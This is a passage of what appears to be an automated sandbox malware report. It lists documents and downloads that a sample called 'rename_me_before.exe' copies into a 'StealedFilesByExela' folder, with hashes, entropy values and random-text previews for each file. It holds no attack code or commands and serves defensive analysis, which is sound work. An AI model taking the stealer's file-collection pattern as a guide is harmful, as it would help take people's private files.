                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\UMMBDNEQBN.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\UOOJJOZIRH.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                          MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                          SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                          SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                          SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\VLZDGUKUTZ.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\VLZDGUKUTZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\WKXEWIOTXI.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                                          MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                                          SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                                          SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                                          SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\WUTJSCBCFX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\XZXHAVGRAG.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\BPMLNOBVSB.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\DTBZGIOOSO.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                          Malicious:false
